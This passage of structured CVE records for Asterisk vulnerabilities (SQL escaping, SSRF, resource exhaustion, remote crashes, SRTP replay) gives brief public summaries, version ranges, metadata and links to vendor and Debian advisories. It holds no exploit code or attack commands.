                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-11-18T00:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "url": "https://downloads.asterisk.org/pub/security/"
            },
            {
              "url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
            },
            {
              "url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
            },
            {
              "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
              "tags": [
                "mailing-list"
              ],
              "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
            },
            {
              "name": "DSA-5285",
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://www.debian.org/security/2022/dsa-5285"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2022-26651",
        "datePublished": "2022-04-15T00:00:00.000Z",
        "dateReserved": "2022-03-07T00:00:00.000Z",
        "dateUpdated": "2024-08-03T05:11:43.391Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-26499 (GCVE-0-2022-26499)

    Vulnerability from nvd – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03
    VLAI
    Summary
    An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it's possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T05:03:32.912Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
              },
              {
                "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
                "tags": [
                  "mailing-list",
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
              },
              {
                "name": "DSA-5285",
                "tags": [
                  "vendor-advisory",
                  "x_transferred"
                ],
                "url": "https://www.debian.org/security/2022/dsa-5285"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it\u0027s possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-11-18T00:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "url": "https://downloads.asterisk.org/pub/security/"
            },
            {
              "url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
            },
            {
              "url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
            },
            {
              "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
              "tags": [
                "mailing-list"
              ],
              "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
            },
            {
              "name": "DSA-5285",
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://www.debian.org/security/2022/dsa-5285"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2022-26499",
        "datePublished": "2022-04-15T00:00:00.000Z",
        "dateReserved": "2022-03-06T00:00:00.000Z",
        "dateUpdated": "2024-08-03T05:03:32.912Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-26498 (GCVE-0-2022-26498)

    Vulnerability from nvd – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03
    VLAI
    Summary
    An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T05:03:32.984Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
              },
              {
                "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
                "tags": [
                  "mailing-list",
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
              },
              {
                "name": "DSA-5285",
                "tags": [
                  "vendor-advisory",
                  "x_transferred"
                ],
                "url": "https://www.debian.org/security/2022/dsa-5285"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2023-05-04T00:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "url": "https://downloads.asterisk.org/pub/security/"
            },
            {
              "url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
            },
            {
              "url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
            },
            {
              "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
              "tags": [
                "mailing-list"
              ],
              "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
            },
            {
              "name": "DSA-5285",
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://www.debian.org/security/2022/dsa-5285"
            },
            {
              "url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2022-26498",
        "datePublished": "2022-04-15T00:00:00.000Z",
        "dateReserved": "2022-03-06T00:00:00.000Z",
        "dateUpdated": "2024-08-03T05:03:32.984Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-32558 (GCVE-0-2021-32558)

    Vulnerability from nvd – Published: 2021-07-27 05:19 – Updated: 2024-08-03 23:25
    VLAI
    Summary
    An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T23:25:30.855Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
                "tags": [
                  "mailing-list",
                  "x_refsource_FULLDISC",
                  "x_transferred"
                ],
                "url": "http://seclists.org/fulldisclosure/2021/Jul/49"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
              },
              {
                "name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
                "tags": [
                  "mailing-list",
                  "x_refsource_MLIST",
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
              },
              {
                "name": "DSA-4999",
                "tags": [
                  "vendor-advisory",
                  "x_refsource_DEBIAN",
                  "x_transferred"
                ],
                "url": "https://www.debian.org/security/2021/dsa-4999"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2021-11-02T10:06:13.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
              "tags": [
                "mailing-list",
                "x_refsource_FULLDISC"
              ],
              "url": "http://seclists.org/fulldisclosure/2021/Jul/49"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
            },
            {
              "name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
              "tags": [
                "mailing-list",
                "x_refsource_MLIST"
              ],
              "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
            },
            {
              "name": "DSA-4999",
              "tags": [
                "vendor-advisory",
                "x_refsource_DEBIAN"
              ],
              "url": "https://www.debian.org/security/2021/dsa-4999"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2021-32558",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
                  "refsource": "FULLDISC",
                  "url": "http://seclists.org/fulldisclosure/2021/Jul/49"
                },
                {
                  "name": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
                },
                {
                  "name": "https://downloads.asterisk.org/pub/security/AST-2021-008.html",
                  "refsource": "MISC",
                  "url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
                },
                {
                  "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29392",
                  "refsource": "MISC",
                  "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
                },
                {
                  "name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
                  "refsource": "MLIST",
                  "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
                },
                {
                  "name": "DSA-4999",
                  "refsource": "DEBIAN",
                  "url": "https://www.debian.org/security/2021/dsa-4999"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2021-32558",
        "datePublished": "2021-07-27T05:19:34.000Z",
        "dateReserved": "2021-05-11T00:00:00.000Z",
        "dateUpdated": "2024-08-03T23:25:30.855Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-31878 (GCVE-0-2021-31878)

    Vulnerability from nvd – Published: 2021-07-27 05:17 – Updated: 2024-08-03 23:10
    VLAI
    Summary
    An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T23:10:30.837Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
                "tags": [
                  "mailing-list",
                  "x_refsource_FULLDISC",
                  "x_transferred"
                ],
                "url": "http://seclists.org/fulldisclosure/2021/Jul/48"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2021-07-27T11:10:28.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
              "tags": [
                "mailing-list",
                "x_refsource_FULLDISC"
              ],
              "url": "http://seclists.org/fulldisclosure/2021/Jul/48"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2021-31878",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
                  "refsource": "FULLDISC",
                  "url": "http://seclists.org/fulldisclosure/2021/Jul/48"
                },
                {
                  "name": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
                },
                {
                  "name": "http://downloads.asterisk.org/pub/security/AST-2021-007.html",
                  "refsource": "MISC",
                  "url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
                },
                {
                  "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29381",
                  "refsource": "MISC",
                  "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
                },
                {
                  "name": "https://downloads.digium.com/pub/security/AST-2021-007.html",
                  "refsource": "MISC",
                  "url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2021-31878",
        "datePublished": "2021-07-27T05:17:05.000Z",
        "dateReserved": "2021-04-29T00:00:00.000Z",
        "dateUpdated": "2024-08-03T23:10:30.837Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-26713 (GCVE-0-2021-26713)

    Vulnerability from nvd – Published: 2021-02-19 19:30 – Updated: 2024-08-03 20:33
    VLAI
    Summary
    A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T20:33:40.660Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2021-02-19T19:30:30.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://downloads.asterisk.org/pub/security/"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2021-26713",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://downloads.asterisk.org/pub/security/",
                  "refsource": "MISC",
                  "url": "https://downloads.asterisk.org/pub/security/"
                },
                {
                  "name": "https://downloads.asterisk.org/pub/security/AST-2021-004.html",
                  "refsource": "MISC",
                  "url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
                },
                {
                  "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29205",
                  "refsource": "MISC",
                  "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2021-26713",
        "datePublished": "2021-02-19T19:30:30.000Z",
        "dateReserved": "2021-02-05T00:00:00.000Z",
        "dateUpdated": "2024-08-03T20:33:40.660Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-26712 (GCVE-0-2021-26712)

    Vulnerability from nvd – Published: 2021-02-18 20:10 – Updated: 2024-08-03 20:33
    VLAI
    Summary
    Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T20:33:40.803Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/"
              },
              {
                "name": "20210218 AST-2021-003: Remote attacker could prematurely tear down SRTP calls",
                "tags": [
                  "mailing-list",
                  "x_refsource_FULLDISC",
                  "x_transferred"
                ],
                "url": "http://seclists.org/fulldisclosure/2021/Feb/59"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2021-02-19T15:06:09.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://downloads.asterisk.org/pub/security/"
            },
            {
              "name": "20210218 AST-2021-003: Remote attacker could prematurely tear down SRTP calls",
              "tags": [
                "mailing-list",
                "x_refsource_FULLDISC"
              ],
              "url": "http://seclists.org/fulldisclosure/2021/Feb/59"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2021-26712",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://downloads.asterisk.org/pub/security/",
                  "refsource": "MISC",
                  "url": "https://downloads.asterisk.org/pub/security/"
                },
                {
                  "name": "20210218 AST-2021-003: Remote attacker could prematurely tear down SRTP calls",
                  "refsource": "FULLDISC",
                  "url": "http://seclists.org/fulldisclosure/2021/Feb/59"
                },
                {
                  "name": "https://downloads.asterisk.org/pub/security/AST-2021-003.html",
                  "refsource": "CONFIRM",
                  "url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
                },
                {
                  "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29260",
                  "refsource": "CONFIRM",
